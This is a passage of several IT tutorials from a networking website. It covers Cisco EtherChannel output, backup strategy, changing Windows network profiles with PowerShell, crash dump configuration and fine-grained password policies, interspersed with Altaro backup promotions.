Note: First create the Port-Channel interface and assign the physical interfaces to it using the channel-group 1 mode active command. After that, any commands entered under the Port-Channel interface will automatically be replicated to all port members (FastEthernet 1/0/1 & 1/0/2 in our example).

In case VLAN Trunking support is required, do not forget to use the switchport mode trunk command to enable trunking and then switchport trunk native vlan X to configure the native VLAN for the EtherChannel, replacing X with the necessary vlan number.

Additional Information: Configure VLANs and InterVLAN Routing on Cisco Catalyst switches

At this point, we are able to connect our server to the network. The show interface port-channel 1 command will provide a plethora of information about our Port-Channel, including bandwidth, interface members and other useful information:

FCX-3750-S# show interface port-channel 1
 
Port-channel1 is up, line protocol is up (connected)
Hardware is EtherChannel, address is 0015.627a.1585 (bia 0015.627a.1585)
MTU 1500 bytes, BW 200000 Kbit, DLY 100 usec,
     reliability 255/255, txload 1/255, rxload 1/255
Encapsulation ARPA, loopback not set
Keepalive set (10 sec)
Full-duplex, 200Mb/s, link type is auto, media type is unknown
input flow-control is off, output flow-control is unsupported
Members in this channel: Fa1/0/1 Fa1/0/2
ARP type: ARPA, ARP Timeout 04:00:00
Last input never, output 00:00:01, output hang never
Last clearing of "show interface" counters never
Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0
Queueing strategy: fifo
Output queue: 0/40 (size/max)
5 minute input rate 0 bits/sec, 0 packets/sec
5 minute output rate 7000 bits/sec, 7 packets/sec
     9521 packets input, 7321804 bytes, 0 no buffer
     Received 3599 broadcasts (1623 multicasts)
     0 runts, 0 giants, 0 throttles
     0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored
     0 watchdog, 1623 multicast, 0 pause input
     0 input packets with dribble condition detected
     12038 packets output, 1875191 bytes, 0 underruns
     0 output errors, 0 collisions, 2 interface resets
     0 babbles, 0 late collision, 0 deferred
     0 lost carrier, 0 no carrier, 0 PAUSE output
     0 output buffer failures, 0 output buffers swapped out

The show Etherchannel 1 summary command provides additional information, including the aggregation protocol used, port members, their status and more:

FCX-3750-S# show etherchannel 1 summary
 
Flags: D - down       P - bundled in port-channel
       I - stand-alone s - suspended
       H - Hot-standby (LACP only)
       R - Layer3     S - Layer2
       U - in use     f - failed to allocate aggregator
       M - not in use, minimum links not met
       u - unsuitable for bundling
       w - waiting to be aggregated
       d - default port
Number of channel-groups in use: 1
Number of aggregators:           1
Group     Port-channel       Protocol       Ports
------+------------------+------------+------------------------
1            Po1(SU)         LACP         Fa1/0/1(P) Fa1/0/2(P)

This article covered Windows Server NIC Teaming and explained the different type of NIC Teaming, protocols involved, load & balancing distribution algorithms, configuration of Windows 2012 Server plus configuration of Cisco Catalyst switch configuration. To read more on Cisco switches, make sure you visit our Cisco Technical Knowledgebase which contains technical articles on Cisco switches, routers, firewalls and IP Telephony.

  • Hits: 46279

The Importance of a Comprehensive Backup Strategy for Physical and Virtual Servers

comprehensive-backup-strategy-physical-virtual-serversPeople and companies usually adopt a backup strategy suited to the needs of their working environment. As such, there is no absolute right or wrong method of backing up data however in order to backup and restore data swiftly and easily a comprehensive strategy is necessary, even though most virtualized platforms such as Hyper-V and VMware offer built-in backup-like features such as snapshots or ability to copy a whole virtual machine to another location.

Broadly, this encompasses four rules which we've briefly outlined below:

  • Backups must be performed automatically
  • Backups must have redundancy
  • A copy of the backup must be available offsite
  • Backups must be regularly tested
  • Usage of high-quality backup applications for Virtualized environments e.g VM Backup

Running Windows or Linux Server under ESX or Hyper-V? Get an award-winning backup solution for Free! Download Now!

Most often, people will not remember to take backups on time. They may keep deferring the task because of laziness, oversight or work pressure. Whatever the cause, it defeats the very purpose of backing up. Therefore, a backup solution that automates the task is essential. Simply configure it once and let it take backups at regular intervals.

Although backing up is essential and one backup is better than not backing up at all, there remains the risk of that single backup failing at the time of need. Therefore, your strategy must include having two different types of backup. Another advantage of this is you have greater flexibility when restoring data.

Unexpected events can lead to data loss at any time. Fire, floods, theft, power surge, lightning strikes and so many other things can play havoc with the best laid plans. If your systems and backups are at the same location, you are most likely to lose both. As a contingency measure, you must keep a copy of the backup at a site physically and geographically separated from your primary workplace. Accomplishing offsite backups is simple with automatic cloud backup services that also allow automated updating.

Your backups are stored on physical devices that can also fail. Testing them regularly is one way to avoid unpleasant surprises when you need them most. Have a backup verification day, at least once every few months, to test and verify the integrity of the drive. Essentially, you need to ensure it is possible to restore files and, in case of clone backups, boot from the drive.

Full Backup

A full backup creates an image file containing all disk sectors with data from within the operating system. Although the simplest form of backup, it is the least flexible, most time consuming and a hugely space-intensive method. Full backups are usually done about once a week as part of an overall backup plan, such as after a major operating system upgrade or software install.

Differential Backup

Typically, only a very small percentage of the information in a partition or disk changes daily or weekly, therefore it is enough to back up only the data that has changed. You are doing a differential backup if you are backing up only the files that have changed since the last full backup. Differential backups are faster and more flexible than full backups because of the lower amount of data involved. However, the amount of data being backed up grows with each differential backup. That makes it unwieldy to create more than one differential backup a day.

Incremental Backup

You are doing an incremental backup if you are backing up only the data that changed since the last backup – whether full or incremental. Therefore, the shorter the time interval between incremental backups, the lower the amount of data to be backed up – you may backup hourly or even more frequently, depending on the importance of your work. Although incremental backups are the most flexible and granular of the three methods, restoring from incremental backups takes longer.

Backing up Virtual Machines

While most companies have moved to a virtualized environments, the above backup methods are quickly being replaced by smarter and more efficient backup strategies. For example, VM backup software, free for two VMs, supports both Hyper-V and VMware and offers complete backup and restore functionality with the click of only a few buttons. It’s advanced backup algorithms and smart design makes backing up and restoring virtual machines or individual files/folders a very simple process.

  • Hits: 10216

Free Webinar: Troubleshooting & Fixing Microsoft Hyper-V Hosts & Clusters

free-webinar-troubleshooting-hyper-v-1Users working with Hyper-V Virtualization would be interested to know that Altaro is hosting a free webinar on the 25th of February 2016 at 4pm CET / 10am EST. Microsoft Cloud and Datacenter Management MVPs Didier Van Hoye and Andy Syrewicze will be answering questions on how to fix a broken Hyper-V Host or Hyper-V Cluster and will also be sharing some tales from the trenches.

Don't miss out on this exclusive Hyper-V webinar and make sure you grab your free copy of Altaro's Hyper-V & VMware backup software!

 

Note: While this event's date has passed, you can access the recorded version while also download all material provided. Simply follow the above link to access it.

  • Hits: 9396

How to Easily Change Network Card Profile / Network Location (Private or Public) on Windows Server 2012 R2

Network Location Awareness (NLA) is a feature offered on Windows Server 2012 R2 and all Windows workstation editions from Windows 8.1 and above, including Windows 10. When connecting to a network (LAN or Wireless) it is often misidentified as a Public network instead of a Private network or vice versa. The same problem is also seen when adding an additional network card to a Windows 2012 server. This article explains how to use Windows PowerShell to quickly change any Network Card identification between a Public or Private Network and ensure the correct Firewall rules are applied (if in use).

The screenshot below shows our Windows 2012 R2 server configured with two network cards. We’ve renamed the network cards to easily identify them, as such Ethernet0 was renamed to “Ethernet0 – WAN Adapter”, while Ethernet1 was renamed to “Ethernet1 – LAN Adapter”.

Backup any Virtual Environment (Hyper-V or VMware) with Altaro, quickly and Free for a Limited Time – Download Now!

The Windows Network Location Awareness (NLA) has incorrectly identified Ethernet0 to be connected to a Private network, while Ethernet1 is also incorrectly identified to be connected to a Public network, as shown below:

Windows Network Location Awareness (NLA) incorrectly identifies the Private & Public networks on our network interface cards

Figure 1. Windows Network Location Awareness (NLA) incorrectly identifies the Private & Public networks on our network interface cards

We should note that incorrect network profiles (Private or Public) also means that the Windows Firewall is applying the incorrect rules to the network cards. For example, a Public network could have very strict rules configured, while the Private network might have less restrictive rules applied. As one can understand, this also creates a serious security hole and therefore the correct network profiles (Private or Public) must be applied to each network interface card (network adapter).

Quickly Change Network Profiles (Public or Private) via PowerShell

To begin, launch the Windows PowerShell console by click on the PowerShell icon located on the taskbar:

Launching the Windows PowerShell console

Figure 2. Launching the Windows PowerShell console

Next, at the prompt enter the command Get-NetconnectionProfile to obtain a list of all network interfaces on the Windows Server, along with their identified network category (Private / Public):

Executing Get-NetconnectionProfile PowerShell cmd to obtain network profile & ID info

Figure 3. Executing Get-NetconnectionProfile PowerShell cmd to obtain network profile & ID info

Notice that the command output is identical to what we saw in the Network and Sharing Center screenshot at the beginning of the article.

Looking closely to the ouput, we’ll notice that each network card has an InterfaceAlias and InterfaceIndex value. The InterfaceAlias is the name of the network card, in our case Ethernet0 – WAN Adapter and Ethernet1 – LAN Adapter respectively, while the InterfaceIndex represents the index number of the physical interface - that is 12 for Ethernet0 and 24 for Ethernet1.

The final step is using the Set-NetConnectionProfile command used to configure each adapter to a network profile. First we set the LAN Network card (Ethernet 1) to the Private network profile and then the WAN Network card (Ethernet 0) to the Public network profile as shown below:

Changing network profile for both network cards using the Set-NetConnectionProfile command

Figure 4. Changing network profile for both network cards using the Set-NetConnectionProfile command

Users can use either the –InterfaceAlias or -InterfaceIndex parameter to select the network interface to be changed. Here are the full commands for each parameter:

Set-NetConnectionProfile -InterfaceAlias "Ethernet1 - LAN Adapter" -NetworkCategory Private

or

Set-NetConnectionProfile -InterfaceIndex 24 -NetworkCategory Private

Don’t miss out on your Free Altaro Virtualization backup solution for Hyper-V & VMware. Limited Time Download!

Moving back to the Network and Sharing Center, we can see that both network interfaces are now bound to the correct network profile:

Network interfaces are now bound to the correct network profile

Figure 5. Network interfaces are now bound to the correct network profile

This article explained how to change the network profiles configured on a Windows Server 2012 network interface cards. We talked about the importance of having the correct network profiles configured to each network interface card and how this affect the Windows Firewall rules. We also showed two different PowerShell commands (Set-NetConnectionProfile -InterfaceIndex & Set-NetConnectionProfile –InterfaceAlias) that can be used to make the network profile changes.

  • Hits: 37691

Free Webinar: Scripting & Automation in Hyper-V without System Center Virtual Machine Manager (SCVMM)

System Center Virtual Machine Manager (SCVMM) provides some great automation benefits for those organizations that can afford the hefty price tag. However, if SCVMM isn’t a cost effective solution for your business, what are you to do? While VMM certainly makes automation much easier, you can achieve a good level of automation with PowerShell and the applicable PowerShell modules for Hyper-V, clustering, storage, and more.

Click and Download Your Free Hyper-V or VMware backup solution Now!

Are you looking to get grips with automation and scripting?

Join Thomas Maurer, Microsoft Datacenter and Cloud Management MVP, who will use this webinar to show you how to achieve automation in your Hyper-V environments, even if you don’t have SCVMM.

Remember, any task you have to do more than once, should be automated. Bring some sanity to your virtual environment by adding some scripting and automation know-how to your toolbox.

Note: While the Webinar date has passed, you can still access the presentation and download all resources for free. Click below to access it:

Register for the webinar here:

hyper-v-altaro-free-webinar-scripting-automation-hyper-v-without-scvmm-1

About the presenter:

Thomas Maurer

Thomas Maurer works as a Cloud Architect at itnetx gmbh, a consulting and engineering company located in Bern/Switzerland, which has been awarded by Microsoft as “Microsoft Datacenter Partner of the Year for the past three years (2011,2012,2013). Thomas is focused on Microsoft Technologies, especially Microsoft Cloud Solutions based Microsoft System Center, Microsoft Virtualization and Microsoft Azure. This includes Microsoft Hyper-V, Windows Server, Storage, Networking and Azure Pack as well as Service Management Automation.

About the host:

Andrew Syrewicze

Andy is a Technical Evangelist for Altaro Software, providing technical marketing and pre-sales expertise. Prior to that Andy spent the last 12+ years providing technology solutions across several industry verticals including, education, fortune 500 manufacturing, healthcare and professional services working for MSPs and Internal IT Departments. During that time he became an expert in VMware, Linux, and Network Security, but his main focus over the last 7 years has been in Virtualization, Cloud Services and the Microsoft Server Stack, with an emphasis on Hyper-V.

  • Hits: 9361

How to Install Desktop Icons (Computer, User’s Files, Network, Control Panel) on Windows 2012 Server. Bring Back The Traditional Windows (7,8) Desktop Icons!

One of the first things IT Administrators and IT Managers notice after a fresh installation of Windows 2012 Server is that there are no Desktop Icons apart from the Recycle Bin. Desktop icons such as Computer, User’s Files, Network & Control Panel are not available by default. Desktop icons are now available through the Personalize menu, when right-clicking in an empty area on the desktop, however this menu option is not available by default.

windows-server-2012-display-desktop-icons-computer-network-user-files-1
Figure 1. Personalize Menu is not available by default on Windows 2012 Server

To bring back the Desktop icons, administrators must first install the Desktop Experience feature on Windows 2012 Server.

Running Windows 2012 Server in a virtual environment? Get an award-winning backup solution for Free!! Download Now!

Note: Once the Desktop Experience Feature is installed, the server will require a restart.

To do so, click on the Server Manager icon on the taskbar:

windows-server-2012-display-desktop-icons-computer-network-user-files-2

Figure 2. Server Manager icon on Windows 2012 Server taskbar

 Now select Add Roles and Features:

windows-server-2012-display-desktop-icons-computer-network-user-files-3

Figure 3. Selecting Add roles and features in Windows 2012 Server

 

Now, click Next on the Before you Begin page and at the Installation Type page select Role-based or feature-based installation. Next, select your server from the server pool and click Next:

windows-server-2012-display-desktop-icons-computer-network-user-files-4

Figure 4. Selecting our destination server

At the next window, click on Features located at the left side, do not select anything from the Server Roles which is displayed by default. Under Features, scroll down to User Interfaces and Infrastructure and click to expand it. Now tick Desktop Experience:

windows-server-2012-display-desktop-icons-computer-network-user-files-5

Figure 5. Selecting Desktop Experience under User Interfaces and Infrastructure

When Desktop Experience is selected, a pop up window will ask us to confirm the installation of a few additional services or features required. At this point, simply click on Add Features. Now click on Next and then the Install button.

This will install all necessary server components and add-ons:

windows-server-2012-display-desktop-icons-computer-network-user-files-6

Figure 6. Installation of server components and add-ons - Windows 2012 Server

Once complete, the server will require a restart. After the server restart, we can right-click in an empty area on our desktop and we’ll see the Personalize menu. Select it and then click on Change desktop icons from the next window:

windows-server-2012-display-desktop-icons-computer-network-user-files-7

Figure 7. Selecting Change desktop icons - Windows 2012 Server

Now simply select the desktop icons required to be displayed and click on OK:

windows-server-2012-display-desktop-icons-computer-network-user-files-8

Figure 8. Select Desktop icons to be displayed on Windows 2012 Server Desktop

Free Award-Winning Backup solution for VMware and Hyper-V virtualization environments. Click here!

This article showed how to enable Desktop Icons (Computer, User files, Network , Control Panel) on Windows 2012 Server. We explained this process using a step-by-step process and included all necessary screenshots to ensure a quick and trouble-less installation. For more Windows 2012 Server tutorials, visit our Windows Server Section.

  • Hits: 18896

Easy, Fast & Reliable Hyper-V & VMware Backup with Altaro's Free Backup Solution

windows-hyper-v-free-backup-1aAs more companies around the world adopt the virtualization technology to increase efficiency and productivity, Microsoft’s Hyper-V virtualization platform is continuously gaining ground in the global virtualization market, as is the need for IT departments to provide rock-solid backup solutions for their Hyper-V virtualized environment.

History has shown that backup procedures were always a major pitfall for most IT departments and companies. With virtualization environments, the need of a backup solution is more important than ever, especially when we consider that physical servers now host multiple virtual servers.

While creating a backup plan and verifying backups can become an extremely complicated and time-consuming process, Altaro has managed to deliver a backup solution that guarantees the backup process of the virtualized environment and ensures the data integrity of servers. Furthermore, Altaro’s backup solution is complimented with a simple recovery procedure, guaranteeing quick and easy recovery from the failure of any virtual machine and hypervisor host. 

What’s even better is that Altaro’s Hyper-V & VMware backup solution is completely free for a limited number of virtual servers!

Download your Free Hyper-V & VMware Altaro Backup Solution Now - Limited Offer!

Altaro Hyper-V & VMware backup is a feature-rich application that allows users to backup and restore VMs literally with just a few clicks. The user interface of Altaro VM backup is easy-to-use with all the necessary features to make the Hyper-V or VMware backup & restore process, an easy and simple task.

Main Features Of Altaro VM Backup

  • User-friendly easy to use admin console.
  • Supports Microsoft Windows Server 2012 R2, 2012, 2008 R2, Hyper-V & ESX/ESXi server core.
  • Backup virtual machines per schedule.
  • Restore single or multiple virtual machines to different Hyper-V/VMware host or same host.
  • Rename virtual machines while restoring the virtual machine to same host or different host.
  • Backup Linux VMs without shutting down the machine.
  • Secured backups with AES encryption.
  • Reduced backup file size with powerful compression.
  • Central Altaro Hyper-V backup management for multiple Hyper-V host.
  • File level restore allows you to mount backup up VHDs and restore individual files without actually restoring the whole virtual machine.
  • Business continuity with offsite backup with WAN acceleration.
  • Backup Exchange Server VM (Supports Exchange 2007, 2010, 2013) and can restore Exchange item level restore options.
  • Support backup for Hyper-V cluster shared volumes for larger deployments.
  • Support for Microsoft SQL Database VM backup.
  • Free for up to two Virtual Machines.
  • Extremely low pricing per host (not per socket) provides unbeatable value.

It is evident that Altaro Hyper-V backup provides a plethora of features that makes it a viable solution for companies of any size.

Altaro Hyper-V  Backup Installation Requirements

Installing the Altaro Hyper-V backup application is no different than installing any other windows application, it is very easy.
It is important to note that Altaro Hyper-V backup must be installed in Hyper-V host machine, and not a guest machine. Altaro Hyper-V supports the following host server editions:

  • Windows 2008 R2 (all editions)
  • Windows Hyper-V Server 2008 R2 (core installation)
  • Windows Server 2012 (all editions)
  • Windows Hyper-V Server 2012 (core installation)
  • Windows Server 2012 R2 (all editions)
  • Windows Hyper-V Server 2012 R2 (core installation)

Minimum system requirements of Altaro Hyper-V Backup are:

  • 350 MB Memory
  • 1 GB free Hard Disk space for Altaro Hyper-V Backup Program and Settings files
  • .NET Framework 3.5 on Windows Server 2008 R2
  • .NET Framework 4.0 on Windows Server 2012

Following is a list of supported backup destinations. This is where you would save the backup of your Hyper-V virtual machines:

  • USB External Drives
  • eSata External Drives
  • USB Flash Drives
  • Fileserver Network Shares using UNC Paths
  • NAS devices (Network Attached Storage) using UNC Paths
  • RDX Cartridges
  • PC Internal Hard Drives (recommended only for evaluation purposes)

Grab a Free Copy of VM Altaro Backup Solution Now!

Installing Altaro Hyper-V Backup Software

First step is to grap a fresh copy of Altaro’s Hyper-V backup application by downloading the application from Altaro’s website.
Run the installation file. We will receive the application’s welcome screen. Click Next  to continue through the next windows until the installation is finally complete.

windows-hyper-v-free-backup-1Figure 1. Installation Welcome Screen

After few moments, the installation completes. At this point, check the Launch Management Console and click Finish:
 

windows-hyper-v-free-backup-2 Figure 2. Altaro Hyper-V Installation Complete

At this point, Altaro Hyper-V Backup has been successfully installed on our Hyper-V server and is ready to run by ticking the Launch Management Console option and clicking on the Finish button.

Alternatively, Administrators can also install the Altaro Hyper-V Backup application on a workstation or different server, connect remotely to the Hyper-V server and perform all necessary configuration and backup tasks from there.

We found the ‘remote management’ capability extremely handy and proceeded to try it out on our Windows 7 workstation.
It’s worth noting that it makes no difference whether you select to run Altaro’s Hyper-V Backup directly on the Hyper-V host or remotely as we did.

After installing the application on our Windows 7 workstation, we ran it and entered the necessary details to connect with the Hyper-V host:

windows-hyper-v-free-backup-3Figure 3. Connecting to the Hyper-V Agent Remotely

Users running the application directly on the Hyper-V host would select the ‘This Machine’ option from above.

Once connected the Hyper-V agent, the Altaro Hyper-V Backup main screen appears:


windows-hyper-v-free-backup-4 Figure 4. Altaro Hyper-V Backup - Main Screen (click to enlarge)

Altaro’s Hyper-V Backup solution offers an extensive number of options. When running the application for the first time, it provides a quick 3-step guide to help quickly setup a few mandatory options and begin performing your first Hyper-V backup in just a couple of minutes!  

In our upcoming articles, we’ll be taking a closer look on how Altaro’s Hyper-V Backup application manages to make life easy for Virtualization administrators, with its easy backup and restore procedures.

Summary

This article introduced Altaro’s Hyper-V Backup application – a complete backup and restore solution that manages to take away the complexity of managing backup and restore procedures for any size Hyper-V virtualization environment. Altaro’s Hyper-V Backup solution is completely FREE for a limited number Virtual Machines!

  • Hits: 14594

Troubleshooting Windows Server 2012 R2 Crashes. Analysis of Dump Files & Options. Forcing System Server Crash (Physical/Virtual)

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-001aThere are umpteen reasons why your Windows Server 2012 R2 decides to present you with a Blue Screen of Death (BSOD) or the stop screen. As virtual machines become more prominent in enterprise environments, the same problems that plagued physical servers earlier are now increasingly being observed for crashes of virtual machines as well.

Microsoft designs and configures Windows systems to capture information about the state of the operating systems if a total system failure occurs, unlike a failure of an individual application. You can see and analyze the captured information in the dump files, the settings of which you can configure using the System Tool in the Control Panel. By default, BSOD provides minimal information about the possible cause of the system crash and this may suffice in most circumstances to help in identifying the cause of the crash.

However, some crashes may require a deeper level of information than what the stop screen provides – for example, when your server simply hangs and becomes unresponsive. In that case, you may still be able to see the desktop, but moving the mouse or pressing keys on the keyboard produces no response. To resolve the issue, you need a memory dump. This is basically a binary file that contains a portion of the server's memory just before it crashed. Windows Server 2012 R2 provides five options for configuring memory dumps.

SafeGuard your Hyper-V & VMware servers from unrecoverable crashes with a reliable FREE Backup – Altaro’s VM Backup. Download Now!

Different Types Of Memory Dump Files

1. Automatic Memory Dump

Automatic memory dump is the default memory dump that Windows Server 2012 R2 starts off with. This is really not a new memory dump type, but is a Kernel memory dump that allows the SMSS process to reduce the page file to be smaller than the size of existing RAM. Therefore, this System Managed page file now reduces the size of page file on disk.

2. Complete Memory Dump

A complete memory dump is a record of the complete contents of the physical memory or RAM in the computer at the time of crash. Therefore, this needs a page file that is at least as large as the size of the RAM present plus 1MB. The complete memory dump will usually contain data from the processes that were running when the dump was collected. A subsequent crash will overwrite the previous contents of the dump.

3. Kernel Memory Dump

The kernel memory dump records only the read/write pages associated with the kernel-mode in physical memory at the time of crash. The non-paged memory saved in the kernel memory dump contains a list of running processes, state of the current thread and the list of loaded drivers. The amount of kernel-mode memory allocated by Windows and the drivers present on the system define the size of the kernel memory dump.

4. Small Memory Dump

A small memory dump or a MiniDump is a record of the stop code, parameters, list of loaded device drivers, information about the current process and thread, and includes the kernel stack for the thread that caused the crash.

5. No Memory Dump

Sometimes you may not want a memory dump when the server crashes.

Configuring Dump File Settings

Windows Server 2012 R2 allows you to configure an Automatic memory dump. To start the configuration, you have to log in as a local administrator and click on Control Panel in the Start menu:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-001 

Figure 1. Invoking the Windows Server Control Panel


From the Control Panel, click on System and Security icon. Next, click on System:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-002 

Figure 2. System and Security

In the System Properties that opens up, click on the Advanced tab as shown below:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-003 

Figure 3. System Properties – Advanced Tab

 In the Advanced System Properties, look for and click on Settings under Startup and Recovery section:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-004 

Figure 4. Startup and Recover dialog

 

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-005

Figure 5. The five types of debugging information (memory dumps) available

Here, you have the choice to let your server Automatically restart on System failure. Under Write Debugging information, you can select between one of the five types of memory dumps to be saved in the event of a server crash.
 
You can also define the name of the dump file the server should create and specify its location. The default location is in the System Root and the default name of the file is MEMORY.DMP. If you do not want the previous file to be overwritten by the new dump file, remove the tick mark from Overwrite any existing file (visible in figure 4).

When done, you will need to restart the server for the changes to take place.

Manually Generating A Dump File

Although the server will create the dump files when it crashes, you do not have to wait indefinitely for the crash to occur. As described in Microsoft’s support pages Generating a System Dump via Keyboard and Forcing a System Crash via Keyboard, you can induce the server to crash with a select combination of keys. Of the several methods described by Microsoft, we will discuss the method via USB keyboards.

Forcing a System Crash From the Keyboard

Begin with a command prompt with administrative privileges. For this, begin with the Start menu and click on Command Prompt (Admin):

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-006

Figure 6. Invoking the Command Prompt with Elevated Privileges

In the command prompt window that opens, type in “regedit” to and hit Enter:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-007 

Figure 7. Opening and Editing the Windows Registry

This opens the Registry Editor screen. Now expand all the way to the following section:

HKEY_LOCAL_MACHINE\SYSTEM\CurrrentControlSet\Control\CrashControl

Right-click on CrashControl and create a new DWORD with the name CrashDumpEnabled which will appear in the right hand pane. Next, modify its value by right-clicking on CrashDumpEnabled in the right hand pane and selecting Modify:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-008

Figure 8. Editing the Registry. Modifying the new registry DWORD CrashDumpEnabled

In the Edit DWORD Value dialog that opens enter Value data as 1 and click on OK:

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-009

Figure 9. Editing the Value Data of CrashDumpEnabled

Next step is to go to the following registry location:

HKEY_LOCAL_MACHINE\SYSTEM\CurrrentControlSet\Services\kbdhid\Parameters

Right-click on Parameters and create a new DWORD with the name CrashOnCtrlScroll, which will appear in the right pane:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-010

Figure 10. Editing the Registry. Creating the new Registry DWORD CrashOnCtrlScroll

Now, modify the CrashOnCtrlScroll value by right-clicking on CrashOnCtrlScroll in the right pane and selecting Modify:

windows-2012-troubleshooing-server-crashes-memory-dumps-debug-011 

Figure 11. Modifying the Registry DWORD entry CrashOnCtrlScroll

 In the Edit DWORD Value dialog that opens, enter Value data as 1 and click on OK:

 windows-2012-troubleshooing-server-crashes-memory-dumps-debug-012

Figure 12. Editing the Value data of CrashOnCtrlScroll

Restart the server for the new values to take effect.

Next, to crash the server, press the combination of keys:

CTRL + SCROLL LOCK + SCROLL LOCK

Note: Press SCROLL LOCK key twice while holding down the CTRL key.

The server will crash and restart and should have created a new dump file.

Note: However, as described in the Microsoft support pages referred above, this method does not always work and for other methods, you can refer to additional Microsoft support pages here.

This article explained why Windows Server dump files are considered important and how we can configure Windows Server 2012 R2 to save crash dump files. We saw the different memory Dumps (Automatic Memory Dump, Complete Memory Dump, Kernel Memory Dump, Small Memory Dump, No Memory Dump) and how to configure the dump’s settings. More articles on Windows Server 2012 can be found in our Windows Server 2012 Section.

  • Hits: 82967

Installation and Configuration of Fine-Grained Password Policy for Windows Server 2012

windows-2012-install-setup-fine-grained-password-policy-01aMicrosoft introduced Fine-Grained Password Policy for the first time in Windows Server 2008 and the policy has been part of every Windows Server since then. Fine-Grained Password Policy allows overcoming the limitations of only one password policy for a single domain. A brief example is that we apply different password and account lockout policies to different users in a domain with the help of Fine-Grained Password Policies.
 
This article discusses the Fine-Grained Password Policy as applicable to Windows Server 2012, and the different ways of configuring this policy. Windows Server 2012 allows two methods of configuring the Fine-Grained Password Policy:

1. Using the Windows PowerShell

2. Using the Active Directory Administrative Center or ADAC

In earlier Windows Server editions, it was possible to configure Fine-Grained Password Policy only through the command line interface (CLI). However with Windows Server 2012 a graphical user interface has been added, allowing the configuration of the Fine-Grained Password Policy via the Active Directory Administrative Center. We will discuss both the methods.

Before you begin to implement the Fine-Grained Password Policy, you must make sure the domain functional level must be Windows Server 2008 or higher. Refer to relevant Windows 2012 articles on our website Firewall.cx.

Backup your Windows Server 2012 R2 host using Altaro’s Free Hyper-V & VMware Backup solution. Download Now!

Configuring Fine-Grained Password Policy From Windows PowerShell

Use your administrative credentials to login to your Windows Server 2012 domain controller. Invoke the PowerShell console by Right clicking on the third icon from the left in the taskbar on the Windows Server desktop and then clicking on Run as Administrator.

windows-2012-install-setup-fine-grained-password-policy-01

Figure 1. Executing Windows PowerShell as Administrator

Clicking on Yes to the UAC confirmation will open up an Administrator: Windows PowerShell console.

Within the PowerShell console, type the following command in order to begin the creation of a new fine grained password policy and press Enter:

C:\Windows\system32> New-ADFineGrainedPasswordPolicy

windows-2012-install-setup-fine-grained-password-policy-02

Figure 2. Creating a new Fine Grained Password Policy via PowerShell

Type a name for the new policy at the Name: prompt and press Enter. In our example, we named our policy FGPP:

windows-2012-install-setup-fine-grained-password-policy-03

Figure 3. Naming our Fine Grained Password Policy

Type a precedence index number at the Precedence: prompt and press Enter. Note that policies that have a lower precedence number have a higher priority over those with higher precedence numbers. We’ve set our new policy with a precedence of 15: windows-2012-install-setup-fine-grained-password-policy-04

Figure 4. Setting the Precedence index number of our Fine Grained Password Policy

Now the policy is configured, but has all default values. If there is need to add specific parameters to the policy, you can do that by typing the following at the Windows PowerShell command prompt and press Enter:

C:\Windows\system32> New-ADFineGrainedPasswordPolicy -Name FGPP -DisplayName FGPP -Precedence 15 -ComplexityEnabled $true -ReversibleEncryptionEnabled $false -PasswordHistoryCount 20 -MinPasswordLength 10 -MinPasswordAge 3.00:30:00 -MaxPasswordAge 30.00:30:00 -LockoutThreshold 4 -LockoutObservationWindow 0.00:30:00 -LockoutDuration 0.00:45:00

In the above command, replace the name FGPP with the name of your password policy, which in our example is FGPP.

The parameters used in the above are mandatory and pretty much self-explanatory:

Attributes for Password Settings above include:

  • Enforce password history
  • Maximum password age
  • Minimum password age
  • Minimum password length
  • Passwords must meet complexity requirements
  • Store passwords using reversible encryption

Attributes involving account lockout settings include:

  • Account lockout duration
  • Account lockout threshold
  • Reset account lockout after


To apply the policy to a user/group or users/groups, use the following command at the PowerShell command prompt:

C:\Windows\system32> Add-ADFineGrainedPasswordPolicySubject -Identity FGPP -Subjects “Chris_Partsenidis”

For confirming whether the policy has indeed been applied to the groups/users correctly, type the following command at the PowerShell command prompt and press Enter:

C:\Windows\system32> Get-ADFineGrainedPasswordPolicy -Filter { name -like “FGPP” }

Remember, it is necessary to replace FGPP in the above with the name of your password policy. Also replace Chris_Partsenidis with the name of the group or user to whom you want to apply the policy.

The screenshot below shows the execution of the commands and output:

 windows-2012-install-setup-fine-grained-password-policy-05

Figure 5. Applying and verifying a Fine Grained Password Policy to a User or Group

Check the AppliesTo section from the output to verify if the policy is applied to the intended user or group.

Configuring Fine-Grained Password Policy Using The Active Directory Administrative Center (ADAC)

Use your administrative credentials to login to your Windows Server 2012 domain controller. Invoke the Server Manager Dashboard by left-clicking on the second icon in the taskbar on the Windows Server desktop:

windows-2012-install-setup-fine-grained-password-policy-06

Figure 6. Opening Server Manager Dashboard

In the Server Manager Dashboard, go to the top right hand corner, click on Tools and then click on Active Directory Administrative Center:

windows-2012-install-setup-fine-grained-password-policy-07

Figure 7. Launching Active Directory Administrative Center

Once the Active Directory Administrative Center screen is open, from the left panel, select the Active Directory (local) to expand.

In our example, the active directory is firewall (local). Locate Systems, expand it and click on Password Settings Container:

windows-2012-install-setup-fine-grained-password-policy-08

Figure 8. Locating the Password Settings Container

On the right panel, under Tasks and Password Settings Container, click on New:

windows-2012-install-setup-fine-grained-password-policy-09

Figure 9. Accessing Password Settings Container

Now click on Settings, which will open up the Create Password Settings screen. Enter a name for the Fine-Grained Password Policy and a number for its precedence.

For our example, we are using the name FGPP or Firewall Group Password Policy with a precedence index of 15. Also, configure the remainder of the policy settings as required:

windows-2012-install-setup-fine-grained-password-policy-010 
Figure 10. Configuring settings for our FGPP Policy

Once satisfied with the settings, click on Add at the bottom right hand corner. This will open up the Select Users or Groups dialog.

Click on Object Types to select either Users or Groups or both. Click on Locations to select the domain, which in our case is firewall.local.

Under the object names to select, type the name of the group or user on whom you want to apply the password policy. In our example, this is Chris_Partsenidis as shown below:

